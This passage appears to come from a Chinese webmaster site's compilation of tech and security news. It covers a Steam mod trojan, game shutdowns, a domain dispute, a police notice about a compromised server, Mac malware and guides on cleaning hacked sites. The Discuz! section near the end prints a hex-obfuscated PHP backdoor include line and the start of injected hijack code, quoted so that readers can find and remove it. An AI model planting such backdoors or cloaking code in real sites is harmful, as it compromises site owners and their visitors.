WindowsBootManager”文件夹中。 安全风险和后续处理 这起事件引起了玩家社群的极大担忧,因为“Downfall”这个Mod原本因其出色的质量而在玩家中口碑极佳。官方强调玩家应当保持警惕,并建议在杀毒软件的帮助下检查系统安全。Table 9 Studio 在发现问题后迅速采取行动,将创意工坊内的模组替换回了正常版本,并将Mod的所有权转移到了一个专用的Steam账户上,以防止类似事件再次发生。 对Steam创意工坊的影响 此事件也引发了对Steam创意工坊安全性的讨论。一些评论指出,虽然黑客利用免费模组来分发恶意木马的行为令人不齿,但Steam平台创意工坊的“模组自动更新”功能也应负有一定责任,因为它允许了在玩家不知情的情况下自动安装更新。这次事件可能是与Steam创意工坊上可用模组相关的最引人注目的安全事件之一,引起了用户对其他游戏模组安全性的担忧。 结论和建议 目前,Downfall模组中的不法内容已被彻底清除,玩家可以放心下载游戏。不过,制作组仍建议可能中招的玩家尽快更改重要密码,以防万一。对于Steam用户来说,这起事件是一个提醒,要时刻保持对自动更新内容的警惕,并定期检查系统安全。 #### 《网络信息内容生态治理规定》正式实施:3月起明令禁止网络暴力人肉搜索 3月1日 消息:国家互联网信息办公室发布的《网络信息内容生态治理规定》(以下简称《规定》)于今日正式施行,旨在营造良好网络生态,保障公民、法人和其他组织的合法权益,维护国家安全和公共利益。 《规定》显示,网络信息内容服务使用者和生产者、平台不得开展网络暴力、人肉搜索、深度伪造、流量造假、操纵账号等违法活动。 《规定》要求,网络信息内容生产者应防范和抵制制作、复制、发布含有使用夸张标题、内容与标题严重不符和炒作绯闻、丑闻、劣迹等不良信息等。 违反《规定》,给他人造成损害的,依法承担民事责任;构成犯罪的,依法追究刑事责任;尚不构成犯罪的,由有关主管部门依照有关法律、行政法规的规定予以处罚。 #### 《街头篮球》手游将停服 7月25日 消息:近日,腾讯游戏宣布,由于业务调整,将于今日11点正式停止在中国大陆地区运营《街头篮球》手游。《街头篮球》手游是一款由 JOYCITY 公司授权、北京掌趣科技开发的3v3公平竞技休闲体育手游,于2017年1月开始公测。 具体停服安排如下:今日11点停止游戏运营并关闭游戏服务器,用户将无法登录游戏;明日11点关闭游戏官网;8月2日11点关闭专属客服。 对于已购买过《街头篮球》手游产品且账户中有代币留存的用户,腾讯将提供一份补偿方案。 在补偿活动期间,这些用户可根据账户余额领取与账户余额对应的《全民大灌篮》、《fifa 足球世界》和《全民冠军足球》游戏的相关礼包。具体领取规则为: 1. 账户余额大于0小于等于100,领取价值10元的礼包; 2. 账户余额大于100小于等于1000,领取价值100元的礼包; 3. 账户余额大于1000小于等于5000,领取价值500元的礼包; 4. 账户余额大于5000,可领取多个价值500元的礼包,个数为账户余额除以5000后向上取整。 需要注意的是,参与补偿活动将视为对补偿方案的认可。补偿活动所提供的礼包、点券和抽奖将作为对用户游戏账号中未消耗的虚拟货币和未失效的游戏服务的替换。若用户未参与补偿活动,则视为自动放弃补偿权利。 另外,除非法律法规或与用户签署的协议另有约定,游戏服务器关闭后,腾讯将删除用户账号数据和角色资料等信息。 #### 《魔兽世界》真的下线了!1月24日正式停服 1月20日消息,暴雪中国对外回应称,《魔兽世界》于1月24日凌晨0点终止服务,届时下载功能将会停止,而旗下游戏国服都会在停止。 时间耗尽的账号目前仍可登录并使用此功能,但该条件随后也可能改变。我们建议有意的玩家及早保存。我们想要重申的是,这一功能是对网之易涉及所有《魔兽世界》国服玩家的数据封存的额外补充。 玩家可以一次性同时下载巨龙时代”和经典怀旧服的账号进度吗?不能,经典怀旧服和巨龙时代”的对应功能是单独实装与上线的,所以玩家需要分别下载账号进度。请注意永久60级怀旧服和巫妖王之怒”怀旧服也分开计算,如果玩家希望保存全部三种进度(巨龙时代”、巫妖王之怒”怀旧服和永久60级怀旧服),则需要分别登录每一个客户端进行进度存档操作,每个客户端有独立的存档文件。 安全性方面,暴雪中国称该功能是安全的,其提供了一个涵盖角色信息、装备和游戏进度的综合存档,以期在《魔兽世界》国服重新开放时使用。此外,该功能是对网之易的数据封存的额外补充,网之易对这部分数据负责。 以下为暴雪中国针对《魔兽世界》进度存档常见问题进行的解答: 通用下载问题 问:下载功能会开放多久?什么时候结束? 答:该功能将开放至《魔兽世界》于 1 月 24 日凌晨 0 点终止服务。 问:游戏服务器于 1 月 24 日关闭之后,玩家还能下载账号文件吗? 答:不能。 问:没有游戏时间的玩家可以下载账号进度吗? 答:时间耗尽的账号目前仍可登录并使用此功能,但该条件随后也可能改变。我们建议有意的玩家及早保存。我们想要重申的是,这一功能是对网之易涉及所有《魔兽世界》国服玩家的数据封存的额外补充。 问:玩家可以一次性同时下载巨龙时代”和经典怀旧服的账号进度吗? 答:不能,经典怀旧服和巨龙时代”的对应功能是单独实装与上线的,所以玩家需要分别下载账号进度。请注意永久 60 级怀旧服和巫妖王之怒”怀旧服也分开计算,如果玩家希望保存全部三种进度(巨龙时代”、巫妖王之怒”怀旧服和永久 60 级怀旧服),则需要分别登录每一个客户端进行进度存档操作,每个客户端有独立的存档文件。 安全性问题 问:这个功能用起来安全吗? 答:安全,数以万计的玩家已经成功使用本功能保存了他们的账号进度。我们向《魔兽世界》客户端添加新功能均会经过标准测试。 问: 使用该功能会有安全隐患吗? 答:该功能在实装前经过了严格的安全测试,这是我们一贯的标准。 问:玩家的虚拟财产可能遭到损失吗?暴雪会承担这个责任吗? 答:该功能是安全的,其提供了一个涵盖角色信息、装备和游戏进度的综合存档,以期在《魔兽世界》国服重新开放时使用。此外,该功能是对网之易的数据封存的额外补充,网之易对这部分数据负责。 其他下载细节问题 问:下载是否会影响玩家账号中的其他暴雪游戏? 答:不会,该功能只会锁定玩家的《魔兽世界》账号。 问:如果玩家改变了想法,客户支持能够逆转流程并解锁账号吗? 答:不行。游戏账号被锁定之后就无法逆转,我们建议玩家在选择锁定账号之前仔细考虑。 问:有些玩家的账号因为被其他人(盗号者 / 工作室)登录并下载了账号进度,而被锁定了。你们能解锁这些账号吗? 答:这更多是账号共享 / 保护相关的问题。我们建议玩家保护好自己的账号,不要与其他人共享。 问:如果一直弹出发生错误,请稍后重试。”或进度存档下载失败”,该怎么办? 答:这可能是出于多个原因,但玩家可以继续尝试重新下载账号。成功完成下载时会弹出信息框,显示进度存档下载成功”。 问:账号被锁定之后,玩家可以重新下载存档文件吗?如果可以,能不能指定保存在其他位置? 答:可以,锁定后玩家也可以重新下载存档文件,但文件只能落脚在游戏的安装文件夹里。 问:玩家可以编辑或移动下载的文件吗?如果不可以,假设玩家意外删除了文件或卸载了游戏,那会发生什么? 答:玩家可以且应当将文件备份到多个位置,并安全保管。我们建议玩家将文件备份在多个硬件中,以免电脑发生故障。 问:这是我的账号进度被保存下来的唯一方式吗? 答:我们想要重申的是,这一功能是对网之易涉及所有《魔兽世界》国服玩家的数据封存的额外补充。该功能让玩家将数据掌握在自己手里,以期为国服重新开放使用。 其他背景问题 问:现在要玩家对自己的游玩历史负责了?你们为什么要这么做? 答:该功能是对网之易数据封存的额外补充,主要面向的是希望在游戏服务终止后自己也保留游玩历史的人。 问:玩家可以借用这个功能迁移到海外服务器吗? 答:该功能是对网之易的数据封存的额外补充,是为游戏重返国服而设计的。 问:你们以后会在全球其他地区上线这一功能吗? 答:不会,我们没有计划在全球层面上线这一功能。 #### 《魔兽争霸》官方对战平台要停止运营了 12 月 21 日消息,昨日,《魔兽争霸》官方对战平台发布“魔兽争霸官方对战平台终止运营公告”,公告称,由于与合作方暴雪娱乐的授权期限即将届满,《魔兽争霸》官方对战平台将于 2023 年 1 月 24 日 0 时正式终止运营。 公告称: 即日起至 2023 年 1 月 24 日 0 时期间,平台的服务器将保持开放,用户仍可正常登录平台。 2022 年 12 月 23 日起,关闭平台的现金充值服务,关闭新用户注册入口。商城内所有商品仅保留“牛币”购买方式,用户可继续在商城中消耗账号中的剩余牛币。 2022 年 12 月 27 日起,关闭商城系统(包括平台商城与 RPG 地图商城),一切与商城相关的功能(包括但不限于充值、购买、查看等)将被下架;对于用户已购买的道具,其使用在平台终止运营前将不会受到影响。 2023 年 1 月 24 日 0 时,正式终止平台的运营,停止用户登录并关闭服务器。 公告还称,服务器关闭后,所有账号数据将被暂时封存,我们将按照法律法规的要求妥善处理,保障用户合法权益。针对用户已充值但未消耗的“牛币”以及付费购买且仍未失效的“平台荣耀会员”,我们将在平台正式终止运营后开始安排退款,详情请留意官方后续公告。 据悉,《魔兽争霸》官方对战平台由网易研发运营,暴雪官方唯一认证平台,平台提供《魔兽争霸》1V1、2V2、Dota、RPG 地图等游戏方式,主打无广告快速匹配纯净游戏。 动视暴雪和网易在今年11 月 17 日先后发布声明宣告合作关系的结束,随后网易在魔兽世界官网发布了公告称暴雪游戏,包括《魔兽世界》《炉石传说》《守望先锋》《暗黑破坏神 III》《星际争霸 II》《魔兽争霸 III:重制版》《风暴英雄》将于 2023 年 1 月 24 日 0 时终止运营。 #### 「今目标」办公平台因未支付网络服务器费用,被断网停服 2021年10月23日,今目标发布《服务异常的说明》称:2021年10月20日上午10点,称因未能足额支付IDC服务费,IDC服务商突然断网停服,导致平台服务中断已超80个小时。(云头条推算是17号凌晨2点开始断网,距离26号已经9天时间)。今目标表示资金紧张,IDC服务费延付数额较大,但因IDC服务商内部产权关系发生变化,要求的还款额度大幅提升,远超今目标近期支付能力。 今目标表示整积极联络、调度各方资源,全力筹措资金,力争在2021年10月29日前恢复服务。今目标称曾为400万企业提供免费的SaaS办公平台。因内外多种因素,投资方不再提供资金支持。今目标叹息,更多互联网巨头进入到这个赛道,雄厚资本令行业竞争更加激烈。今目标表示:正全力应对眼前的苦难。 公开资料显示:今目标2012年获得5000万人民币天使轮融资;2014年获1000万美元A轮融资;2015年获6000万美元B轮融资。A、B轮投资方均为老虎全球管理基金(Tiger Global Management)。 今目标2019年7月表示:资金链断裂,无法正常支付员工工资 今目标是一款类似于钉钉,飞书的办公平台,是国内最早做这个的,不过由于国内互联网巨头相继入场,才导致了生存困难,这也是国内互联网的缩影,希望今目标可以挺过去,让国内互联网有更多选择。 #### 【域名投资惨案】1万美元豪赌“Lambo.com”,五年博弈后净亏数百万,他踩中了哪些法律红线? 事件概述:一场估值7500万美元的域名“白日梦” 近日,一桩长达五年的顶级域名争议案以持有者的彻底败诉告终。美国亚利桑那州居民理查德·布莱尔(Richard Blair)于2018年以1万美元购得的域名 Lambo.com,并未如他所愿成为价值7500万美元(约5.3亿人民币)的“数字黄金”,反而被世界知识产权组织(WIPO)及美国法院强制裁定移交予意大利豪华跑车制造商兰博基尼(Automobili Lamborghini S.p.A)。布莱尔不仅血本无归,还需承担双方高昂的律师费用,可谓“赔了夫人又折兵”。 此案为所有域名投资者、品牌方乃至普通网络资产持有者,上了一堂代价高昂的法律与商业实践课。 时间线:从投资到“敲诈”的蜕变 2018年:布莱尔以 10,000美元 购入 Lambo.com,此名称与兰博基尼的经典简称及品牌文化高度重合。 2020-2023年:开启“天价”拍卖之旅,挂牌价从112万英镑一路飙升至 150万 → 330万 → 1200万 → 5800万 → 7500万美元。期间拒绝所有真实出价。 2022年4月:兰博基尼向WIPO提起仲裁申诉。 2022年8月:WIPO仲裁小组裁定布莱尔 “恶意注册”,域名应移交兰博基尼。 2022-2023年:布莱尔向美国法院提起诉讼,试图推翻裁决。 2023年9月:法院维持原判,驳回其上诉。 现今:域名已完成移交,案件落幕。 争议核心:为何法律认定这是“恶意注册”? 根据《统一域名争议解决政策》(UDRP),投诉方(兰博基尼)要成功夺回域名,必须同时证明以下三点,而仲裁小组与法院均一致认定布莱尔的行为完全符合: 域名与投诉方拥有的商标完全相同或混淆性相似。 事实:“Lambo”是兰博基尼在全球范围内广泛认知和使用的简称、昵称,品牌方拥有极强的相关商标权益。域名 Lambo.com 与之完全一致。 域名持有者对该域名不享有任何合法权益或正当理由。 布莱尔的辩称:他自称“Lambo”源于“lamb(小羊羔)”,与汽车品牌无关。 法庭认定:此解释“牵强且缺乏可信度”。证据显示,他在购入域名后才开始使用此称呼,且未能展示任何建设与该名称相关的真实网站或提供真实服务的计划与行动。即,他对“Lambo”并无在先的、善意的商业使用历史。 域名被恶意注册和使用。 关键证据1:意图牟取暴利。短时间内将报价抬升至远超合理投资回报的7500万美元天价,明显意图利用兰博基尼的品牌商誉获取不正当暴利。 关键证据2:挑衅性使用。他将域名解析至个人页面,发布诸如“击败并羞辱任何试图夺走它的人”等挑衅声明,这被认定为 “消极持有” 和 “恶意使用” 的典型表现,旨在向品牌方施压。 关键证据3:缺乏真实使用。从未进行任何与“Lambo”名义相关的真实商业活动或内容建设。 【主机帮】深度解读:此案对四类人群的警示 1. 对域名投资者:认清法律边界,规避“商标陷阱” 核心教训:投资与“敲诈”仅一线之隔。UDRP的核心是保护商标权人免受 “网络蟑螂” 侵害。 实战自查清单: 在收购任何域名前,务必进行全球商标检索(可通过WIPO、各国商标局数据库)。 避免注册与知名品牌、产品系列、创始人名称高度重合或明显暗示关联的域名。 若已持有此类域名,必须进行真实的、善意的商业使用(如搭建内容网站、提供相关服务),并保留所有开发、运营、推广的证据。仅做停放(Parking)或展示出售页面,在争议中极为不利。 2. 对企业与品牌方:主动防守,建立品牌资产护城河 核心行动:将域名注册视为品牌保护的延伸,而非简单的IT采购。 实战策略: 防御性注册:不仅注册核心商标的 .com,还应考虑主要国家代码域名(如 .cn, .uk)及相关拼写变体、常见错误拼写。 持续监控:利用域名监控服务,及时发现并评估针对自身品牌的恶意注册。 熟悉UDRP:这是成本相对较低、效率较高的国际维权工具。一旦发现恶意抢注,应果断收集证据,通过法律或仲裁途径解决。 3. 对普通网站主与创业者:重视网络资产的合规性 启示:你的网站域名是你数字身份的基石。确保其来源清白、权属清晰,避免在未来融资、出售或扩大规模时,因潜在的法律纠纷而价值归零或陷入诉讼。 4. 对所有人:理解“恶意”的法律定义 “恶意”不仅指主观动机,更通过客观行为体现:天价售卖、消极持有、挑衅言论、缺乏真实使用,这些行为链条在仲裁员和法官眼中,就是构成“恶意”的铁证。 结论 Lambo.com 案绝非特例,而是一个标准化的判例。它清晰地划定了域名投资的合法边界:基于商标价值的投机性抢注,并意图通过胁迫商标权人购买而获利,是受到UDRP严厉打击的违法行为。 在数字时代,域名是资产,但更是法律意义上的“不动产”。其价值必须通过真实、善意的使用来创造和体现,而非通过对他人品牌商誉的“绑架”来讹诈。 对于投资者,这意味着需要更多的尽职调查与合规意识;对于企业,则意味着需要更前瞻性的品牌资产保护策略。无视规则者,终将付出远超其所得的代价。 (主机帮提醒:在网络世界掘金,唯有尊重知识产权与商业伦理,方能行稳致远。) #### 【安全事件深度解读】网络安全隐患“告知书”面临警告、罚款,甚至责令暂停相关业务、停业整顿、关闭网站的处罚 时间: 2025年12月26日事件主角: 湖北某财税公司关键事实: 因未履行网络安全保护义务,其域名 及服务器IP 111.255.187.11已被攻击者完全控制,面临严重数据泄露风险。法律依据: 《网络安全法》第十条、第二十五条、第五十九条。整改期限: 2026年1月2日前——留给企业的时间,仅有短短数日。 一、事件剖析:这不仅仅是一次“检查”,而是一次“安全灾难”的曝光 从丹江口市公安局网安大队出具的这份《网络安全隐患告知书》中,我们可以读出远超字面的严重性: “被控制”的极端严重性:文件明确指出网站及服务器“被控制”。这意味着攻击者已获得最高权限,可以任意篡改网页内容、窃取数据库(可能含客户财务信息)、植入后门、甚至将服务器作为跳板攻击其他目标。 财税公司的特殊性:作为一家财税咨询公司,其服务器中存储的客户财务数据、报税资料、企业信息等,是极具价值的攻击目标。一旦泄露,不仅导致客户重大损失,企业更将面临严厉的法律追责与信誉破产。 执法的紧迫性:公安机关设定了一周左右的整改期限,这并非普通通知,而是具有法律强制力的责令整改。逾期未完成,依据《网络安全法》第五十九条,将面临警告、罚款,甚至责令暂停相关业务、停业整顿、关闭网站的处罚。 根本原因:告知书一针见血——“未履行网络安全保护义务”。这通常意味着:无人运维、系统老旧漏洞未修补、弱口令、无任何安全防护措施。 二、实战应急整改方案(7日内必须完成的动作) 如果你是涉事企业的管理员,或正面临类似困境,请立即按此步骤操作: 第一阶段:立即止损(第1-2天) 断开与隔离:立即将受控服务器(111.255.187.11)从网络中断开(关机或拔网线),防止攻击者持续利用或扩散攻击。 启用备份:如果存在近期干净的业务数据备份,立即在新购置或确认安全的服务器上恢复业务。务必确保新环境与旧环境无关。 域名临时接管:将域名 的解析临时指向一个维护页面(例如“系统升级中”),或暂时暂停解析,避免用户访问被黑的网站。 第二阶段:取证、排查与加固(第3-5天) 全面排查:对受控服务器进行完整镜像备份以供取证,然后彻底排查: 系统后门:检查异常账号、可疑定时任务、SSH密钥、隐藏进程。 网站后门:使用D盾、河马查杀等工具全盘扫描Web目录中的webshell。 日志分析:审查Web访问日志、系统登录日志,定位入侵时间和源头。 漏洞修复: 更新与打补丁:升级操作系统、Web服务器(Nginx/Apache)、中间件、数据库(MySQL等)及所有应用(如CMS)到最新版本。 修改所有口令:包括服务器root密码、数据库密码、后台管理员密码,并强制使用“字母+数字+特殊符号”的强密码。 最小化权限:关闭不必要的端口和服务,数据库账户按需分配最小权限。 第三阶段:重建与长期防御(第6-7天及以后)在完成清理后,应在全新的、经过基础加固的系统上重新部署业务。但这仅仅是开始。 三、如何避免成为“下一个”?——构筑企业级安全防线产品方案推荐 一次被黑,代价惨重。亡羊补牢,必须系统性地建立安全防护体系。以下是我在长期实战中总结的,并信赖的解决方案: 1. 针对“网站被控制”的第一道钢铁长城:【高防CDN】/【云防护WAF】 场景:攻击者通常通过Web漏洞(如SQL注入、文件上传)获取控制权。 解决方案: 推荐产品:百度云防护WAF / 京东云星盾SCDN 作用:在攻击流量到达你脆弱的源服务器之前,在云端进行实时清洗和拦截。它能有效防御OWASP Top 10攻击,包括导致“被控制”的各类Web漏洞利用行为。即使网站程序存在未知漏洞(0day),基于行为分析的WAF也能提供一定时间的缓冲保护,为你修复争取时间。 站长点评:“这不是可选,而是现代网站运营的必需品。它能将绝大多数自动化扫描和漏洞利用尝试挡在门外。” 2. 针对“服务器被攻陷”的核心堡垒:【高防服务器】 场景:服务器系统存在漏洞,或通过其他途径被暴力破解、提权。 解决方案: 推荐产品:高防IP / 高防服务器 作用:不仅提供超大带宽的DDoS防护,更关键的是,优质的高防服务提供商会做好基础的系统安全加固,并配备主机安全防护(HIDS) 软件,实时监控文件篡改、异常登录、恶意进程,从服务器内部筑牢防线。 站长点评:“将业务部署在专业的高防服务器上,相当于请了专业的安保团队7x24小时守护你的数据核心。” 3. 必须完成的“规定动作”:强制【SSL证书】部署 场景:明文传输导致数据在传输中被窃听、篡改。 解决方案:为所有域名部署SSL证书,强制开启HTTPS。 作用:实现传输加密,保护客户与网站交互的敏感信息(如登录凭证)不被中间人窃取。同时,HTTPS是现代浏览器的安全标准,有利于SEO和建立用户信任。 站长点评:“在当今网络环境下,没有HTTPS的网站,就像在明信片上写密码。这是成本最低、效果最显著的安全升级之一。” 结语 丹江口市的这封告知书,是敲给所有中小型企业的一记警钟。网络安全不再是“高科技公司”的专属,而是每家企业必须履行的法律义务。攻击无差别,后果很严重。 不要等到网警上门、数据泄露、客户流失时,才追悔莫及。安全防护,永远是“防”的成本远低于“治”的代价。 主机帮为您提供: 从事件应急响应、服务器安全加固,到一站式部署 高防CDN、WAF、SSL证书 的完整解决方案。我们可以协助您快速合规地完成整改,并建立长效安全机制。 (本文根据公开法律文书分析,旨在提供安全警示与解决方案。企业具体技术问题,建议寻求专业安全服务商支持。) #### 【安全警报】新型Mac恶意软件“JSCoreRunner”被发现,可完全劫持Chrome浏览器 8月28日消息,据科技媒体9to5Mac报道,苹果设备安全管理公司Mosyle近日发现一款名为“JSCoreRunner”的新型Mac恶意软件。该恶意软件通过伪装成PDF转换工具的虚假网站“fileripple[.]com”进行传播,目前已成功逃避VirusTotal平台上所有安全检测,属于零日攻击。 攻击者通过虚假PDF转换网站诱导用户下载恶意程序。该软件采用双阶段感染模式:第一阶段安装包“FileRipple.pkg”表面显示为正常PDF工具,实则后台运行恶意代码。虽然苹果已吊销其开发者证书,但恶意载荷实际隐藏在第二阶段安装包“Safari14.1.2MojaveAuto.pkg”中。 由于第二阶段安装包未进行签名,因此能够绕过Gatekeeper默认保护机制。安装后会首先与远程服务器通信确认安装,随后去除隔离属性并设置主程序路径,全程在用户无感知的情况下完成系统感染。 该恶意软件主要针对Google Chrome浏览器,会扫描用户目录下的所有配置文件,修改搜索引擎模板,将搜索和新标签页重定向至伪造搜索服务。同时还会隐藏崩溃日志和会话恢复提示,极大降低用户察觉风险。 浏览器被劫持后,用户可能被导向钓鱼网站、恶意广告或欺诈页面,面临键盘记录、数据窃取和财务诈骗等风险。Mosyle已提供相关文件哈希值,建议用户采用多层安全策略并加强安全意识教育。 (本文基于9to5Mac报道及Mosyle安全报告整理) #### 【官方文档】百度搜索网站被黑防范指南 网站被黑是百度搜索中常见的现象,通常表现为网站中出现大量非本网站发布的类似博彩内容,或网站页面直接跳转到博彩页面。 那么遇到网站被黑该如何处理?如何防范网站被黑?小编整理了一些常见的处理方法,帮助大家更好地防范网站被黑~ 一 及时发现并自查网站被黑 1► 监控搜索结果展现 (1)通过搜索网站核心关键词,关注搜索结果展现情况。若在百度搜索结果中网站展现“安全中心提醒您”风险提示字样,网站存在已被黑的风险。 示例: (2)通过site语法搜索站点域名,结合一些常见的色情、博彩类词汇,搜索结果中展现不属于网站的非法页面、非法违规标题和摘要等。 示例:搜索site:www.xxx.com 棋牌 2► 监控网站流量异常变化 关注搜索资源平台工具【索引量】、【流量与关键词】,是否存在数据骤增或骤降情况,同时通过【流量与关键词】- 热门关键词/热门页面分析关键词和链接,是否涉及博彩或色情; 3 ► 定位流量拦截或异常跳转情况 由于百度搜索用户量大,有些黑客攻击行为仅针对百度搜索引擎,即仅在百度搜索时出现异常跳转,所以站长在自查网站定位问题时,需要从百度搜索结果中点击页面,验证是否正常访问,有无异常跳转。 二 快速解决网站被黑问题 网站被黑,表明网站自身安全可能存在严重漏洞,技术人员应迅速采取手段修复,防止再次被黑。 同时,网站运营人员还需要进行一些资源维护和预防的工作: 1► 及时清理被黑内容(非常重要) 整理网站被黑资源 通过搜索资源平台【流量与关键词】工具查询、site语法搜索等,同时可以分析排查出可能的被黑时间,和服务器上的文件修改时间相比对,清理掉黑客上传、修改过的文件。 注:可以从访问日志中,确定可能的被黑时间。不过黑客可能也修改服务器的访问日志。 将被黑页面设置为404 清理发现的全部被黑内容,将被黑页面设置为404死链。不可将被黑页面跳转至首页。 提交死链 全量404死链数据,通过百度搜索资源平台-【死链提交】工具进行提交,关注死链抓取和生效情况。 2 ► 涉及页面变更 网站如有变更页面,建议使用【链接提交】工具向百度搜索及时提交变更后页面数据。 3 ► 停止网站服务 必要时,可以立即停止网站服务,避免用户继续受影响以及影响其他站点。 三 安全防护的建议 1► 网站系统勤打补丁,保持网站 平台和软件的最新版本。 现在很多资讯类网站用的系统使用了内容管理系统(CMS),比较常见的内容管理系统(CMS)都有一个问题,那就是漏洞比较大众化,因为源码是公开的,所以很容易被研究出漏洞,需要对网站程序及时进行漏洞修复。 2► 对服务器进行安全防护 (1)对服务器上的网站权限做设置,合理分(1)配读、写和执行权限,禁止文件恶意修改,后台文件隐藏或迁移到根目录之外。 (2)确保服务器密码安全,避免管理员弱密码等问题。 3► 不建议使用开源程序默认的 robots文件 下图是一个地级市的资讯类站点的robots文件,从robots文件中可以看出,该网站用的是织梦后台,那黑客就可以通过各种针对织梦攻击的软件进行操作,也可以针对织梦网站的常见漏洞进行扫描和针对性攻击。 4► 改造HTTPS,强化网站安全 HTTPS主要由有两部分组成:HTTP+ SSL / TLS,也就是在HTTP上又加了一层处理加密信息的模块。 服务端和客户端的信息传输都会通过TLS进行加密,所以传输的数据都是加密后的数据。 HTTS复杂的加密机制有效的加大了网站的安全性,加密机制与认证机制可以减少网站被劫持和假冒的风险,建议站长们可以通过做HTTPS改造来强化网站安全。 5► 其他安全手段 (1)尽可能关闭非必要端口,防止被端口入侵。关闭或限制不必要的上传功能。 (2)安装官方权威的第三方服务器防护软件,设置防火墙等安全措施。 (3)定期检查服务器日志,查看是否有可疑访问,并做好相关数据备份。 #### 【官方解读】关于百度搜索劲风算法的详细介绍 2月27日,百度搜索资源平台发布了《劲风算法即将上线》的官方公告,针对恶劣聚合页问题进行规范和控制。为了更好的帮助广大开发者了解劲风算法,避免出现类似问题影响站点、智能小程序在搜索中的表现,我们结合算法发布后大家关注度较高的问题逐一拆解说明,请广大开发者参考。 本次劲风算法主要针对以下四类恶劣聚合页问题: 一、内容跨领域 页面内容与站点本身所属领域不符,或站点无专注领域,多为采集拼凑内容。 整改建议: 1、开发者应当对站点进行全面自查,清理与站点所属领域不符的聚合页内容; 2、针对站点本身无专注领域的情况,建议开发者将站点内容收敛集中于某个主要领域下,生产专注于该领域的优质原创内容,通过提升内容专注度获得更多搜索用户的点击。 问题示例1:站点内容领域分散 二、题文不符 聚合页内容与标题或标签描述不符,大部分情况是标题所描述的信息超出了页面的承载内容,甚至与页面内容毫不相关。 整改建议: 1、开发者可以评估页面内容与标题的相关性,以此筛选并清理内容与标题、标签不符的聚合页; 2、在内容生产的过程中,开发者应当提升内容与标题、标签的匹配度,保证页面的标题、标签能够准确概括页面内容,没有夸大或不实情况。 问题示例2:页面内容与标题不符 三、静态搜索结果页 基于网站搜索功能大量生成的静态搜索结果页。 整改建议: 1、建议开发者不要生产此类页面,专注于生产满足用户需求的优质内容资源; 2、对于已有的静态搜索结果页,可以对百度搜索进行robots操作。 问题示例3:静态搜索结果页 四、无效聚合页 空短、无有效信息、失效的聚合页。 整改建议: 1、请开发者对站点下的页面内容进行排查,清理低质、无效的聚合页面; 2、开发者在生产聚合页时,应当保证页面内容足够丰富、优质,避免出现聚合页中内容资源较少、不符合用户预期的情况。 问题示例4:未提供有效信息的聚合页 除了以上整改建议外,针对此次劲风算法中开发者关注度较高的几个问题,我们给出了解答及引导,请广大开发者参考。 劲风算法Q&A Q1:为什么要上线劲风算法? A1:首先,批量生成的劣质聚合页会造成站内资源泛滥,占用搜索引擎资源,影响百度蜘蛛在收录过程中发现其他优质内容; 其次,通过技术手段批量生成的聚合页,通常存在标题信息对页面内容夸大甚至不实的问题,进而导致搜索用户获取的信息与用户预期之间有较大落差,伤害用户体验; 此外,部分开发者生产劣质聚合页,实际目的是为了吸引用户点击,以此获益,对搜索结果的公正性产生恶劣影响。 Q2:我的网站自带站内搜索功能,用户搜索时会产生正常的搜索结果聚合页,这种情况是否会对我的网站产生影响呢?对于静态的搜索结果页,网站难以排查,如果没有及时删除清理的话,是否会对站点在搜索中的评价产生影响? A2:对于网站提供给访问者的动态搜索页面,此类页面不会被搜索引擎收录; 对于站点构造的静态搜索结果页,劲风算法会在识别后结合站点的整体搜索表现给予不同程度的处理。 劲风算法将于近期陆续上线,请广大开发者对照以上内容,尽快对自己站点中的聚合页进行排查整改,避免不必要的损失。 关于此算法如果您还有任何问题,请通过搜索资源平台-反馈中心进行反馈。 #### 【彻底解决】Discuz!被挂马 搜索引擎快照被劫持 网页被跳转!!! 00X0 网站被挂马 搜索引擎快照被劫持 网页被跳转 如果你的网站被劫持到一些非法站点上导致网站被标记为非法、赌博时,可能直接会被各种浏览器和搜索引擎标记为“恶意网站”从而直接拦截。世间最痛苦的事莫过于此,特么的被人阴了... 苦心经营网站多年,树立口碑不容易。一日被黑,日日被劫持。从此以后用户通过搜索引擎打开你的网站不是色情就是赌博。正常业务啥都没了,也别再谈什么可信度和口碑了。网站被收录与网站无关且违禁的博彩关键词,如果处理不及时,措施不当等待你的将是搜索引擎的惩罚:网站排名与权重下降,轻则不收录重则被k。 00X1 站长们苦恼的问题 网站被挂马该怎么解决?网站挂马的解决方法、网站被挂马怎么排查?网站老是被黑被挂马是什么原因?如何检测网站被挂马?网站快照被劫持怎么办?搜索引擎劫持怎么解决?百度快照被篡改劫持怎么回事?360快照被劫持怎么解决?discuz(DZ)被挂马快照被劫持的解决办法?dz论坛被挂马、快照劫持怎么防范?网页被跳转到博彩页面怎么办?诸如此类的问题不在罗列实在是太多了,下面就解决你的疑问! 00X2 挂马原理分析 快照劫持、搜索跳转其实是黑帽SEO利用站中站脚本自动繁殖文章“能熟练应用快照劫持(流量、爬虫、权重) 搜索跳转到自动繁殖文章(站中站脚本)做自己关键词获取定向流量的方法” 搜索引擎快照劫持是通过代码来判断和识别蜘蛛访问的,若正常访问,则给出正常内容,若判断到是搜素引擎来访问,就给出另一个页面,使搜素引擎抓取快照进行改变,之后判断来路跳转。 [快照劫持挂马方法] 多为下面两种方式实现其劫持功能 第一种:放在上html声明内引导劫持快照 这种劫持要比放在源码中更加高明难以发现,查看源码是看不到任何痕迹的。 第二种:利用字典文件繁殖文章使用include引用并提交给搜索引擎实施劫持 字典文件是一些关键词文件为文章生成提供资源,生成劫持静态文件放到要引用的文件中,根据SEO知识可知一般目录都不会太深,比较深的一般会有sitemap文件放在根目录引导蜘蛛爬取,平时注意下你的目录下sitemap.txt是否被篡改。 第一种是最简单粗暴的加到页面header文件里面引导蜘蛛。第二种相对更加隐蔽些,只需在Include中加上劫持目录即可。 Include引用代码: @include($_SERVER[‘DOCUMENT_ROOT’].PACK('H*','2F646174612F737973646174612F30')); 【处理方法】解密代码:2F646174612F737973646174612F30 解蜜后为:/data/sysdata/0查看此目录找到并清理木马文件。 00X3 DZ论坛挂马常被反复篡改的文件 function_core.php、discuz_application.php、class_core.php、config_global.php注意排查。 一定有很多站长会遇到这个问题,不论怎么修改FTP密码,换服务器...class_core.php文件还是反复被挂马,class_core.php文件反复被挂马什么原因?一会是class_core.php被修改,一会是config_global.php被修改。那是因为木马后门已经扎根在你cms程序内部了,会时刻被唤醒使用。 class_core.php常被插入劫持<head>以上部分代码,就是第一种html声明劫持。查看源码看不到任何信息,只能抓取诊断。 为防恶意使用,仅贴出部分代码。 error_reporting(0); $S9 = 